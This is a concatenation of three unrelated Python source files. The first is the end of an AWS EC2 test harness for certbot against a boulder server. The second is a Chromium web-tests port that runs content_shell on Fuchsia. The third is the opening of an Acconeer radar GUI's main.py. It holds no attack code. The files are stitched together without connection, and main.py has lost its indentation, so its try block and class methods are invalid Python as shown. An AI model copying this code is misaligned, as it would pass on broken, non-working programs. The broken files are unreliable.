                         KEYNAME,
                         machine_type=machine_type,
                         security_group_id=security_group_id,
                         subnet_id=subnet_id,
                         userdata=userdata)
def test_client_process(inqueue, outqueue, boulder_url):
    """Worker-process loop: pulls (index, instance_id, target) work items from
    inqueue until SENTINEL, runs the certbot test script on each instance, and
    reports (index, target, Status) on outqueue."""
    cur_proc = mp.current_process()
    for inreq in iter(inqueue.get, SENTINEL):
        ii, instance_id, target = inreq

        # Each client process is given its own session due to the suggestion at
        # https://boto3.amazonaws.com/v1/documentation/api/latest/guide/resources.html?highlight=multithreading#multithreading-multiprocessing.
        aws_session = boto3.session.Session(profile_name=PROFILE)
        ec2_client = aws_session.resource('ec2')
        instance = ec2_client.Instance(id=instance_id)

        # save all stdout to log file
        # NOTE(review): each work item rebinds sys.stdout without closing the
        # previous log file — the old handle leaks for every item after the
        # first.
        sys.stdout = open(LOGDIR + '/' + '%d_%s.log' % (ii, target['name']), 'w')

        print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
        instance = block_until_instance_ready(instance)
        print("server %s at %s" % (instance, instance.public_ip_address))
        # env.host_string tells fabric which user/host to SSH into.
        env.host_string = "%s@%s" % (target['user'], instance.public_ip_address)
        print(env.host_string)

        try:
            install_and_launch_certbot(instance, boulder_url, target)
            outqueue.put((ii, target, Status.PASS))
            print("%s - %s SUCCESS" % (target['ami'], target['name']))
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
        # `except Exception:` would be safer — confirm no caller relies on this.
        except:
            outqueue.put((ii, target, Status.FAIL))
            print("%s - %s FAIL" % (target['ami'], target['name']))
            traceback.print_exc(file=sys.stdout)
            pass

        # append server certbot.log to each per-machine output log
        print("\n\ncertbot.log\n" + "-" * 80 + "\n")
        try:
            execute(grab_certbot_log)
        except:
            # Best-effort: a missing log must not fail the whole run.
            print("log fail\n")
            traceback.print_exc(file=sys.stdout)
            pass
def cleanup(cl_args, instances, targetlist):
    """Terminate (or report, with --saveinstances) the EC2 client instances.

    Note: boulder_server is a module-level global set in main().
    """
    print('Logs in ', LOGDIR)
    # If lengths of instances and targetlist aren't equal, instances failed to
    # start before running tests so leaving instances running for debugging
    # isn't very useful. Let's cleanup after ourselves instead.
    if len(instances) != len(targetlist) or not cl_args.saveinstances:
        print('Terminating EC2 Instances')
        if cl_args.killboulder:
            boulder_server.terminate()
        for instance in instances:
            instance.terminate()
    else:
        # print login information for the boxes for debugging
        for ii, target in enumerate(targetlist):
            print(target['name'],
                  target['ami'],
                  "%s@%s" % (target['user'], instances[ii].public_ip_address))
def main():
    """End-to-end driver: package the repo under test, provision EC2
    (subnet, security group, boulder server, one client instance per target),
    run the test script on all clients in parallel worker processes, then
    summarize results and clean up."""
    # Fabric library controlled through global env parameters
    env.key_filename = KEYFILE
    env.shell = '/bin/bash -l -i -c'
    env.connection_attempts = 5
    env.timeout = 10
    # replace default SystemExit thrown by fabric during trouble
    class FabricException(Exception):
        pass
    env['abort_exception'] = FabricException

    # Set up local copy of git repo
    #-------------------------------------------------------------------------------
    print("Making local dir for test repo and logs: %s" % LOGDIR)
    local('mkdir %s' % LOGDIR)

    # figure out what git object to test and locally create it in LOGDIR
    # ('~' is the argparse default meaning "not given").
    print("Making local git repo")
    try:
        if cl_args.pull_request != '~':
            print('Testing PR %s ' % cl_args.pull_request,
                  "MERGING into master" if cl_args.merge_master else "")
            execute(local_git_PR, cl_args.repo, cl_args.pull_request, cl_args.merge_master)
        elif cl_args.branch != '~':
            print('Testing branch %s of %s' % (cl_args.branch, cl_args.repo))
            execute(local_git_branch, cl_args.repo, cl_args.branch)
        else:
            print('Testing master of %s' % cl_args.repo)
            execute(local_git_clone, cl_args.repo)
    except FabricException:
        print("FAIL: trouble with git repo")
        traceback.print_exc()
        exit()

    # Set up EC2 instances
    #-------------------------------------------------------------------------------
    # NOTE(review): yaml.load() without an explicit Loader can construct
    # arbitrary Python objects; prefer yaml.safe_load() for config files.
    configdata = yaml.load(open(cl_args.config_file, 'r'))
    targetlist = configdata['targets']
    print('Testing against these images: [%d total]' % len(targetlist))
    for target in targetlist:
        print(target['ami'], target['name'])

    print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s" % (PROFILE, KEYNAME, KEYFILE))
    aws_session = boto3.session.Session(profile_name=PROFILE)
    ec2_client = aws_session.resource('ec2')

    # Pick the first subnet that satisfies should_use_subnet(); the for/else
    # branch fires only when no subnet matched.
    print("Determining Subnet")
    for subnet in ec2_client.subnets.all():
        if should_use_subnet(subnet):
            subnet_id = subnet.id
            vpc_id = subnet.vpc.id
            break
    else:
        print("No usable subnet exists!")
        print("Please create a VPC with a subnet named {0}".format(SUBNET_NAME))
        print("that maps public IPv4 addresses to instances launched in the subnet.")
        sys.exit(1)

    # Reuse the security group if an earlier run created it.
    print("Making Security Group")
    vpc = ec2_client.Vpc(vpc_id)
    sg_exists = False
    for sg in vpc.security_groups.all():
        if sg.group_name == SECURITY_GROUP_NAME:
            security_group_id = sg.id
            sg_exists = True
            print(" %s already exists" % SECURITY_GROUP_NAME)
    if not sg_exists:
        security_group_id = make_security_group(vpc).id
        # Give AWS time to propagate the new security group.
        time.sleep(30)

    # Reuse a running boulder server from a previous run if one exists.
    boulder_preexists = False
    boulder_servers = ec2_client.instances.filter(Filters=[
        {'Name': 'tag:Name', 'Values': ['le-boulderserver']},
        {'Name': 'instance-state-name', 'Values': ['running']}])
    boulder_server = next(iter(boulder_servers), None)

    print("Requesting Instances...")
    if boulder_server:
        print("Found existing boulder server:", boulder_server)
        boulder_preexists = True
    else:
        print("Can't find a boulder server, starting one...")
        boulder_server = make_instance(ec2_client,
                                       'le-boulderserver',
                                       BOULDER_AMI,
                                       KEYNAME,
                                       machine_type='t2.micro',
                                       #machine_type='t2.medium',
                                       security_group_id=security_group_id,
                                       subnet_id=subnet_id)

    instances = []
    try:
        if not cl_args.boulderonly:
            print("Creating instances: ", end="")
            for target in targetlist:
                instances.append(
                    create_client_instance(ec2_client, target,
                                           security_group_id, subnet_id)
                )
            print()

        # Configure and launch boulder server
        #-------------------------------------------------------------------------------
        print("Waiting on Boulder Server")
        boulder_server = block_until_instance_ready(boulder_server)
        print(" server %s" % boulder_server)

        # env.host_string defines the ssh user and host for connection
        env.host_string = "ubuntu@%s" % boulder_server.public_ip_address
        print("Boulder Server at (SSH):", env.host_string)
        if not boulder_preexists:
            print("Configuring and Launching Boulder")
            config_and_launch_boulder(boulder_server)
            # blocking often unnecessary, but cheap EC2 VMs can get very slow
            block_until_http_ready('http://%s:4000' % boulder_server.public_ip_address,
                                   wait_time=10, timeout=500)

        # Clients reach boulder over the VPC-private address.
        boulder_url = "http://%s:4000/directory" % boulder_server.private_ip_address
        print("Boulder Server at (public ip): http://%s:4000/directory" % boulder_server.public_ip_address)
        print("Boulder Server at (EC2 private ip): %s" % boulder_url)

        if cl_args.boulderonly:
            sys.exit(0)

        # Install and launch client scripts in parallel
        #-------------------------------------------------------------------------------
        print("Uploading and running test script in parallel: %s" % cl_args.test_script)
        print("Output routed to log files in %s" % LOGDIR)
        # (Advice: always use Manager.Queue, never regular multiprocessing.Queue
        # the latter has implementation flaws that deadlock it in some circumstances)
        manager = Manager()
        outqueue = manager.Queue()
        inqueue = manager.Queue()

        # launch as many processes as clients to test
        num_processes = len(targetlist)
        jobs = []  # keep a reference to current procs

        # initiate process execution
        for i in range(num_processes):
            p = mp.Process(target=test_client_process, args=(inqueue, outqueue, boulder_url))
            jobs.append(p)
            p.daemon = True  # kills subprocesses if parent is killed
            p.start()

        # fill up work queue
        for ii, target in enumerate(targetlist):
            inqueue.put((ii, instances[ii].id, target))

        # add SENTINELs to end client processes
        for i in range(num_processes):
            inqueue.put(SENTINEL)
        print('Waiting on client processes', end='')
        for p in jobs:
            while p.is_alive():
                p.join(5 * 60)
                # Regularly print output to keep Travis happy
                print('.', end='')
                sys.stdout.flush()
        print()

        # add SENTINEL to output queue
        outqueue.put(SENTINEL)

        # clean up
        execute(local_repo_clean)

        # print and save summary results
        results_file = open(LOGDIR + '/results', 'w')
        outputs = [outq for outq in iter(outqueue.get, SENTINEL)]
        outputs.sort(key=lambda x: x[0])
        failed = False
        for outq in outputs:
            ii, target, status = outq
            if status == Status.FAIL:
                failed = True
            print('%d %s %s' % (ii, target['name'], status))
            results_file.write('%d %s %s\n' % (ii, target['name'], status))
        # A worker that died before reporting shows up as a missing output.
        if len(outputs) != num_processes:
            failed = True
            failure_message = 'FAILURE: Some target machines failed to run and were not tested. ' +\
                'Tests should be rerun.'
            print(failure_message)
            results_file.write(failure_message + '\n')
        results_file.close()

        if failed:
            sys.exit(1)

    finally:
        cleanup(cl_args, instances, targetlist)

        # kill any connections
        fabric.network.disconnect_all()
# Script entry point; module-level configuration (cl_args, LOGDIR, etc.) is
# established earlier in the file.
if __name__ == '__main__':
    main()
|
fuchsia.py | # Copyright (C) 2018 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import os
import select
import socket
import subprocess
import sys
import threading
from blinkpy.common import exit_codes
from blinkpy.common.path_finder import WEB_TESTS_LAST_COMPONENT
from blinkpy.common.path_finder import get_chromium_src_dir
from blinkpy.web_tests.port import base
from blinkpy.web_tests.port import driver
from blinkpy.web_tests.port import factory
from blinkpy.web_tests.port import linux
from blinkpy.web_tests.port import server_process
# Modules loaded dynamically in _import_fuchsia_runner().
# pylint: disable=invalid-name
fuchsia_target = None
qemu_target = None
symbolizer = None
# pylint: enable=invalid-name
# Imports Fuchsia runner modules. This is done dynamically only when FuchsiaPort
# is instantiated to avoid dependency on Fuchsia runner on other platforms.
def _import_fuchsia_runner():
    """Dynamically import the Fuchsia runner modules from build/fuchsia.

    Called from FuchsiaPort.__init__ so that other platforms never need these
    modules on their import path; the imports are published as module globals.
    """
    sys.path.insert(0, os.path.join(get_chromium_src_dir(), 'build/fuchsia'))
    # pylint: disable=import-error
    # pylint: disable=invalid-name
    global aemu_target
    import aemu_target
    global device_target
    import device_target
    global fuchsia_target
    import target as fuchsia_target
    global qemu_target
    import qemu_target
    global symbolizer
    import symbolizer
    # pylint: enable=import-error
    # pylint: enable=invalid-name
# pylint: disable=redefined-outer-name
# Path to the content shell package relative to the build directory.
CONTENT_SHELL_PACKAGE_PATH = 'gen/content/shell/content_shell/content_shell.far'

# HTTP path prefixes for the HTTP server.
# WEB_TEST_PATH_PREFIX should be matched to the local directory name of
# web_tests because some tests and test_runner find test root directory
# with it.
WEB_TESTS_PATH_PREFIX = '/third_party/blink/' + WEB_TESTS_LAST_COMPONENT

# Paths to the directory where the fonts are copied to. Must match the path in
# content/shell/app/blink_test_platform_support_fuchsia.cc .
FONTS_DEVICE_PATH = '/system/fonts'

# Number of CPU cores in qemu.
CPU_CORES = 4

# Number of content_shell instances to run in parallel.
# Allow for two CPU cores per instance. Floor division keeps this an int:
# under Python 3, "CPU_CORES / 2" is true division and would make
# MAX_WORKERS the float 2.0, which then propagates out of
# FuchsiaPort.num_workers(). "//" is identical on Python 2 ints.
MAX_WORKERS = CPU_CORES // 2

# Seconds to wait for content_shell to connect back over the stdin socket.
PROCESS_START_TIMEOUT = 20

_log = logging.getLogger(__name__)
def _subprocess_log_thread(pipe, prefix):
    """Forward every line read from *pipe* to the error log, tagged with
    *prefix*, until the pipe reaches EOF; always closes the pipe."""
    try:
        line = pipe.readline()
        while line:
            _log.error('%s: %s', prefix, line)
            line = pipe.readline()
    finally:
        pipe.close()
class SubprocessOutputLogger(object):
    """Streams a child process's stdout to the error log on a daemon thread.

    close() (also invoked from __del__) kills the process, which closes its
    stdout and thereby ends the logging thread.
    """

    def __init__(self, process, prefix):
        self._process = process
        self._thread = threading.Thread(
            target=_subprocess_log_thread, args=(process.stdout, prefix))
        # Daemon thread: never blocks interpreter shutdown.
        self._thread.daemon = True
        self._thread.start()

    def __del__(self):
        self.close()

    def close(self):
        # Killing the process closes its stdout pipe, unblocking the thread.
        self._process.kill()
class _TargetHost(object):
    """Owns a started Fuchsia target: boots it, sets up port forwarding and
    log capture, installs the content_shell package, and tears everything
    down in cleanup()."""

    def __init__(self, build_path, build_ids_path, ports_to_forward, target,
                 results_directory):
        try:
            self._amber_repo = None
            self._target = target
            self._target.Start()
            self._setup_target(build_path, build_ids_path, ports_to_forward,
                               results_directory)
        except:
            # Partial setup must not leak a running target; re-raise after
            # cleanup so the caller still sees the original failure.
            self.cleanup()
            raise

    def _setup_target(self, build_path, build_ids_path, ports_to_forward,
                      results_directory):
        # Tell SSH to forward all server ports from the Fuchsia device to
        # the host.
        forwarding_flags = [
            '-O',
            'forward',  # Send SSH mux control signal.
            '-N',  # Don't execute command
            '-T'  # Don't allocate terminal.
        ]
        for port in ports_to_forward:
            forwarding_flags += ['-R', '%d:localhost:%d' % (port, port)]
        self._proxy = self._target.RunCommandPiped([],
                                                   ssh_args=forwarding_flags,
                                                   stdout=subprocess.PIPE,
                                                   stderr=subprocess.STDOUT)

        # Capture the device's system log, symbolized, into the results dir.
        self._listener = self._target.RunCommandPiped(['log_listener'],
                                                      stdout=subprocess.PIPE,
                                                      stderr=subprocess.STDOUT)

        listener_log_path = os.path.join(results_directory, 'system_log')
        listener_log = open(listener_log_path, 'w')
        self.symbolizer = symbolizer.RunSymbolizer(
            self._listener.stdout, listener_log, [build_ids_path])

        # Amber repo serves packages to the device; entered manually here and
        # exited in cleanup().
        self._amber_repo = self._target.GetAmberRepo()
        self._amber_repo.__enter__()

        package_path = os.path.join(build_path, CONTENT_SHELL_PACKAGE_PATH)
        self._target.InstallPackage([package_path])

        # Process will be forked for each worker, which may make QemuTarget
        # unusable (e.g. waitpid() for qemu process returns ECHILD after
        # fork() ). Save command runner before fork()ing, to use it later to
        # connect to the target.
        self.target_command_runner = self._target.GetCommandRunner()

    def run_command(self, command):
        # Safe to call after fork() — uses the saved command runner rather
        # than the (possibly unusable) target object.
        return self.target_command_runner.RunCommandPiped(
            command,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)

    def cleanup(self):
        if self._amber_repo:
            self._amber_repo.__exit__(None, None, None)
        if self._target:
            # Emulator targets will be shutdown during cleanup.
            # TODO(sergeyu): Currently __init__() always starts Qemu, so we can
            # just shutdown it. Update this logic when reusing target devices
            # for multiple test runs.
            if not isinstance(self._target, device_target.DeviceTarget):
                self._target.Shutdown()
            self._target = None
class FuchsiaPort(base.Port):
    """web_tests Port that runs content_shell on a Fuchsia target
    (qemu, aemu or a physical device), serving tests over HTTP from the
    host instead of copying them onto the target."""

    port_name = 'fuchsia'

    SUPPORTED_VERSIONS = ('fuchsia', )

    FALLBACK_PATHS = {
        'fuchsia':
        ['fuchsia'] + linux.LinuxPort.latest_platform_fallback_path()
    }

    def __init__(self, host, port_name, **kwargs):
        super(FuchsiaPort, self).__init__(host, port_name, **kwargs)
        self._operating_system = 'fuchsia'
        self._version = 'fuchsia'
        # Selects which target type setup_test_run() starts
        # ('qemu'/'aemu'/'device' — see setup_test_run).
        self._target_device = self.get_option('device')

        # TODO(sergeyu): Add support for arm64.
        self._architecture = 'x86_64'

        self.server_process_constructor = FuchsiaServerProcess

        # Used to implement methods that depend on the host platform.
        self._host_port = factory.PortFactory(host).get(**kwargs)

        # May already be set when a worker process inherits the target from
        # the manager (see setup_test_run()).
        self._target_host = self.get_option('fuchsia_target')
        self._zircon_logger = None
        self._host_ip = self.get_option('fuchsia_host_ip')
        _import_fuchsia_runner()

    def _driver_class(self):
        return ChromiumFuchsiaDriver

    def _path_to_driver(self, target=None):
        return self._build_path_with_target(target, CONTENT_SHELL_PACKAGE_PATH)

    def __del__(self):
        if self._zircon_logger:
            self._zircon_logger.close()

    def setup_test_run(self):
        """Start/connect the Fuchsia target, install content_shell, and
        optionally begin Zircon log capture. Returns NO_DEVICES_EXIT_STATUS
        on target start failure."""
        super(FuchsiaPort, self).setup_test_run()
        try:
            target_args = {
                'out_dir': self._build_path(),
                'system_log_file': None,
                'fuchsia_out_dir': self.get_option('fuchsia_out_dir')
            }
            if self._target_device == 'device':
                additional_args = {
                    'target_cpu': self.get_option('fuchsia_target_cpu'),
                    'ssh_config': self.get_option('fuchsia_ssh_config'),
                    'os_check': 'ignore',
                    'host': self.get_option('fuchsia_host'),
                    'port': self.get_option('fuchsia_port'),
                    'node_name': self.get_option('fuchsia_node_name')
                }
                target_args.update(additional_args)
                target = device_target.DeviceTarget(**target_args)
            else:
                # Emulator (qemu or aemu) configuration.
                additional_args = {
                    'target_cpu': 'x64',
                    'cpu_cores': CPU_CORES,
                    'require_kvm': True,
                    'ram_size_mb': 8192
                }
                if self._target_device == 'qemu':
                    target_args.update(additional_args)
                    target = qemu_target.QemuTarget(**target_args)
                else:
                    additional_args.update({
                        'enable_graphics': False,
                        'hardware_gpu': False
                    })
                    target_args.update(additional_args)
                    target = aemu_target.AemuTarget(**target_args)
            self._target_host = _TargetHost(self._build_path(),
                                            self.get_build_ids_path(),
                                            self.SERVER_PORTS, target,
                                            self.results_directory())

            if self.get_option('zircon_logging'):
                self._zircon_logger = SubprocessOutputLogger(
                    self._target_host.run_command(['dlog', '-f']), 'Zircon')

            # Save fuchsia_target in _options, so it can be shared with other
            # workers.
            self._options.fuchsia_target = self._target_host

        except fuchsia_target.FuchsiaTargetException as e:
            _log.error('Failed to start qemu: %s.', str(e))
            return exit_codes.NO_DEVICES_EXIT_STATUS

    def clean_up_test_run(self):
        if self._target_host:
            self._target_host.cleanup()
            self._target_host = None

    def num_workers(self, requested_num_workers):
        # Run a single qemu instance.
        return min(MAX_WORKERS, requested_num_workers)

    def _default_timeout_ms(self):
        # Use 20s timeout instead of the default 6s. This is necessary because
        # the tests are executed in qemu, so they run slower compared to other
        # platforms.
        return 20000

    def requires_http_server(self):
        """HTTP server is always required to avoid copying the tests to the VM.
        """
        return True

    def start_http_server(self, additional_dirs, number_of_drivers):
        # Expose the trees the tests reference so the device can fetch them
        # over HTTP rather than having them copied into the VM.
        additional_dirs['/third_party/blink/PerformanceTests'] = \
            self._perf_tests_dir()
        additional_dirs[WEB_TESTS_PATH_PREFIX] = self.web_tests_dir()
        additional_dirs['/gen'] = self.generated_sources_directory()
        additional_dirs['/third_party/blink'] = \
            self._path_from_chromium_base('third_party', 'blink')
        super(FuchsiaPort, self).start_http_server(additional_dirs,
                                                   number_of_drivers)

    def path_to_apache(self):
        # Delegated to the host-platform port: apache runs on the host.
        return self._host_port.path_to_apache()

    def path_to_apache_config_file(self):
        return self._host_port.path_to_apache_config_file()

    def default_smoke_test_only(self):
        return True

    def get_target_host(self):
        return self._target_host

    def get_build_ids_path(self):
        # ids.txt lives next to the content_shell package and maps build ids
        # to unstripped binaries for the symbolizer.
        package_path = self._path_to_driver()
        return os.path.join(os.path.dirname(package_path), 'ids.txt')
class ChromiumFuchsiaDriver(driver.Driver):
    """Driver that launches content_shell on the Fuchsia target via `run`
    and rewrites local test paths into HTTP URLs served by the host."""

    def __init__(self, port, worker_number, no_timeout=False):
        super(ChromiumFuchsiaDriver, self).__init__(port, worker_number,
                                                    no_timeout)

    def _initialize_server_process(self, server_name, cmd_line, environment):
        # Pass the host IP so the FuchsiaServerProcess can advertise the
        # stdin-redirect socket address to content_shell.
        self._server_process = self._port.server_process_constructor(
            self._port,
            server_name,
            cmd_line,
            environment,
            more_logging=self._port.get_option('driver_logging'),
            host_ip=self._port._host_ip)

    def _base_cmd_line(self):
        cmd = [
            'run',
            'fuchsia-pkg://fuchsia.com/content_shell#meta/content_shell.cmx'
        ]
        # qemu has no GPU; run headless there.
        if self._port._target_device == 'qemu':
            cmd.append('--ozone-platform=headless')
        # Use Scenic on AEMU
        else:
            cmd.extend([
                '--ozone-platform=scenic', '--enable-oop-rasterization',
                '--use-vulkan', '--enable-gpu-rasterization',
                '--force-device-scale-factor=1', '--use-gl=stub',
                '--enable-features=UseSkiaRenderer,Vulkan'
            ])
        return cmd

    def _command_from_driver_input(self, driver_input):
        command = super(ChromiumFuchsiaDriver,
                        self)._command_from_driver_input(driver_input)
        # Absolute local paths are rewritten to URLs on the host's HTTP
        # server, since tests are not copied onto the device.
        if command.startswith('/'):
            relative_test_filename = \
                os.path.relpath(command, self._port.web_tests_dir())
            command = 'http://127.0.0.1:8000' + WEB_TESTS_PATH_PREFIX + \
                '/' + relative_test_filename
        return command
# Custom version of ServerProcess that runs processes on a remote device.
class FuchsiaServerProcess(server_process.ServerProcess):
    """ServerProcess variant that starts content_shell on the Fuchsia target,
    routing its stdin over a TCP socket and symbolizing its stderr."""

    def __init__(self,
                 port_obj,
                 name,
                 cmd,
                 env=None,
                 treat_no_data_as_crash=False,
                 more_logging=False,
                 host_ip=None):
        super(FuchsiaServerProcess, self).__init__(
            port_obj, name, cmd, env, treat_no_data_as_crash, more_logging)
        self._symbolizer_proc = None
        # Address content_shell uses to reach the host for stdin redirect.
        self._host_ip = host_ip or qemu_target.HOST_IP_ADDRESS

    def _start(self):
        if self._proc:
            raise ValueError('%s already running' % self._name)
        self._reset()

        # Fuchsia doesn't support stdin stream for packaged applications, so the
        # stdin stream for content_shell is routed through a separate TCP
        # socket. Open a local socket and then pass the address with the port as
        # --stdin-redirect parameter. content_shell will connect to this address
        # and will use that connection as its stdin stream.
        listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listen_socket.bind(('127.0.0.1', 0))
        listen_socket.listen(1)
        stdin_port = listen_socket.getsockname()[1]

        # Environment variables are passed as KEY=VALUE prefixes on the
        # remote command line.
        command = ['%s=%s' % (k, v) for k, v in self._env.items()] + \
            self._cmd + \
            ['--no-sandbox', '--stdin-redirect=%s:%s' %
             (self._host_ip, stdin_port)]
        proc = self._port.get_target_host().run_command(command)

        # Wait for incoming connection from content_shell.
        fd = listen_socket.fileno()
        read_fds, _, _ = select.select([fd], [], [], PROCESS_START_TIMEOUT)
        if fd not in read_fds:
            listen_socket.close()
            proc.kill()
            raise driver.DeviceFailure(
                'Timed out waiting connection from content_shell.')

        # Python's interfaces for sockets and pipes are different. To masquerade
        # the socket as a pipe dup() the file descriptor and pass it to
        # os.fdopen().
        stdin_socket, _ = listen_socket.accept()
        fd = stdin_socket.fileno()  # pylint: disable=no-member
        # NOTE(review): unbuffered ("w" with buffering=0) text mode is only
        # valid on Python 2; on Python 3 os.fdopen raises ValueError and this
        # would need mode "wb". Confirm which interpreter runs this port.
        stdin_pipe = os.fdopen(os.dup(fd), "w", 0)
        stdin_socket.close()

        # The socket-backed pipe replaces the (unusable) remote stdin.
        proc.stdin.close()
        proc.stdin = stdin_pipe

        # Run symbolizer to filter the stderr stream.
        self._symbolizer_proc = symbolizer.RunSymbolizer(
            proc.stderr, subprocess.PIPE, [self._port.get_build_ids_path()])
        proc.stderr = self._symbolizer_proc.stdout

        self._set_proc(proc)

    def stop(self, timeout_secs=0.0, kill_tree=False):
        result = super(FuchsiaServerProcess, self).stop(
            timeout_secs, kill_tree)
        if self._symbolizer_proc:
            self._symbolizer_proc.kill()
        return result
|
main.py | import copy
import json
import logging
import os
import re
import signal
import sys
import threading
import time
import traceback
import warnings
import webbrowser
from distutils.version import StrictVersion
import numpy as np
import pyqtgraph as pg
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import (
QApplication,
QCheckBox,
QComboBox,
QFrame,
QLabel,
QLineEdit,
QMainWindow,
QPushButton,
QStackedWidget,
QTabWidget,
QWidget,
)
HERE = os.path.dirname(os.path.realpath(__file__))
sys.path.append(HERE)
sys.path.insert(0, os.path.abspath(os.path.join(HERE, "..")))
sys.path.append(os.path.abspath(os.path.join(HERE, "ml")))
sys.path.append(os.path.abspath(os.path.join(HERE, "elements")))
try:
from acconeer.exptool import SDK_VERSION, clients, configs, recording, utils
from acconeer.exptool.structs import configbase
import data_processing
from helper import (
AdvancedSerialDialog,
BiggerMessageBox,
CollapsibleSection,
Count,
GUIArgumentParser,
HandleAdvancedProcessData,
Label,
LoadState,
SensorSelection,
SessionInfoView,
lib_version_up_to_date,
)
from modules import (
MODULE_INFOS,
MODULE_KEY_TO_MODULE_INFO_MAP,
MODULE_LABEL_TO_MODULE_INFO_MAP,
)
except Exception:
traceback.print_exc()
print("\nPlease update your library with 'python -m pip install -U --user .'")
sys.exit(1)
if "win32" in sys.platform.lower():
import ctypes
myappid = "acconeer.exploration.tool"
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
class GUI(QMainWindow):
    """Main window of the Acconeer Exploration Tool GUI."""

    # Serial-connection baudrate used unless overridden by the user.
    DEFAULT_BAUDRATE = 3000000
    # Static assets / persisted-configuration locations, relative to this file.
    ACC_IMG_FILENAME = os.path.join(HERE, "elements/acc.png")
    LAST_CONF_FILENAME = os.path.join(HERE, "last_config.npy")
    LAST_ML_CONF_FILENAME = os.path.join(HERE, "last_ml_config.npy")

    # Qt signals used to marshal events back onto the GUI thread.
    sig_scan = pyqtSignal(str, str, object)
    sig_sensor_config_pidget_event = pyqtSignal(object)
    sig_processing_config_pidget_event = pyqtSignal(object)
def __init__(self, under_test=False):
    """Build the whole main window: state, widgets, layouts, plot timer.

    under_test=True parses an empty argument list so tests are unaffected
    by the real command line.
    """
    super().__init__()

    self.under_test = under_test

    gui_inarg = GUIArgumentParser()
    if under_test:
        self.args = gui_inarg.parse_args([])
    else:
        self.args = gui_inarg.parse_args()

    # Session / streaming state.
    self.data = None
    self.data_source = None
    self.client = None
    self.num_recv_frames = 0
    self.num_missed_frames = 0
    self.measured_update_rate_fc = utils.FreqCounter()
    self.reset_missed_frame_text_time = None
    self.service_labels = {}
    self.service_params = None
    self.service_defaults = None
    self.advanced_process_data = {"use_data": False, "process_data": None}
    self.override_baudrate = None
    self.session_info = None
    self.threaded_scan = None

    # Central flag dict consulted by set_gui_state()/get_gui_state().
    self.gui_states = {
        "load_state": LoadState.UNLOADED,
        "server_connected": False,
        "replaying_data": False,
        "scan_is_running": False,
        "has_config_error": False,
        "connection_info": None,
        "ml_mode": bool(self.args.machine_learning),
        "ml_tab": "main",
        "ml_model_loaded": False,
        "ml_sensor_settings_locked": False,
        "ml_overwrite_settings": False,
    }

    self.current_data_type = None
    self.current_module_label = None
    self.canvas = None
    self.sensors_available = None
    self.basic_sensor_param_count = Count()
    self.advanced_sensor_param_count = Count()
    self.control_grid_count = Count()
    self.param_grid_count = Count(2)
    self.sensor_widgets = {}

    self.ml_feature_plot_widget = None
    self.ml_eval_model_plot_widget = None
    self.ml_data = None

    # Route pidget events through signals so handlers run on the GUI thread.
    self.sig_sensor_config_pidget_event.connect(self.pidget_sensor_config_event_handler)
    self.sig_processing_config_pidget_event.connect(
        self.pidget_processing_config_event_handler
    )

    # One sensor/processing config instance per module, created up front.
    self.module_label_to_sensor_config_map = {}
    self.module_label_to_processing_config_map = {}
    self.current_module_info = MODULE_INFOS[0]
    for mi in MODULE_INFOS:
        if mi.sensor_config_class is not None:
            self.module_label_to_sensor_config_map[mi.label] = mi.sensor_config_class()
            processing_config = self.get_default_processing_config(mi.label)
            self.module_label_to_processing_config_map[mi.label] = processing_config

    self.setWindowIcon(QIcon(self.ACC_IMG_FILENAME))

    self.main_widget = QtWidgets.QSplitter(self.centralWidget())
    self.main_widget.setStyleSheet("QSplitter::handle{background: lightgrey}")
    self.main_widget.setFrameStyle(QFrame.Panel | QFrame.Sunken)
    self.setCentralWidget(self.main_widget)

    # Widget construction order matters: later init_* calls reference
    # widgets created by earlier ones.
    self.init_pyqtgraph()
    self.init_labels()
    self.init_textboxes()
    self.init_buttons()
    self.init_dropdowns()
    self.init_checkboxes()
    self.init_sublayouts()
    self.init_panel_scroll_area()
    self.init_statusbar()
    self.init_pidgets()

    if self.get_gui_state("ml_mode"):
        self.init_machine_learning()
        self.main_widget.addWidget(self.ml_parent_widget)
        self.canvas_layout = self.tabs["collect"].layout
    else:
        self.canvas_widget = QFrame(self.main_widget)
        self.canvas_layout = QtWidgets.QVBoxLayout(self.canvas_widget)

    self.main_widget.addWidget(self.panel_scroll_area)

    self.update_canvas(force_update=True)

    self.resize(1200, 800)
    self.setWindowTitle("Acconeer Exploration GUI")
    self.show()
    self.start_up()

    lib_version_up_to_date(gui_handle=self)

    self.set_gui_state(None, None)

    self.radar = data_processing.DataProcessing()

